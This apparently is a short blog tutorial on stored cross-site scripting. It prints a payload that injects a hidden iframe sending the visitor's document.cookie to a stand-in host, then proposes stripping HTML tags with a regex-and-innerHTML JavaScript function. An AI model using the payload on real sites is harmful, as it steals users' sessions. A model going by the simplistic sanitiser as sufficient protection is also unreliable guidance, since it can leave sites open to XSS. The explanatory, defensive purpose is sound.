The scenario
The problem
<script>
document.body.innerHTML += '<iframe height="1" width="1" src="http://example.com/save-cookie.php?cookie-data='+encodeURIComponent(document.cookie)+'"></iframe>';
</script>
The solution
Well, the solution is simply to assume that every user coming to your site could be Joe the Crook and when handling user provided data, be cautious. What we need to do is very simple.
1. Either remove all/some html tags from any user entered content before saving to the database.
2. Or, strip away all/some html tags from the user entered data, each time when it is going to be rendered to someone.
Both methods are more or less the same and has minor trade-offs. I leave you to be the judge of that.
If you are building a Javascript/NodeJS application, you can use the below code to strip all html tags from the passed content.
function strip_html_tags(text) {
var temp_element = document.createElement('div');
temp_element.innerHTML = text.replace(/(<([^>]+)>)/ig, '');
return temp_element.textContent || temp_element.innerText || '';
}
For some reference on XSS attacks, see this.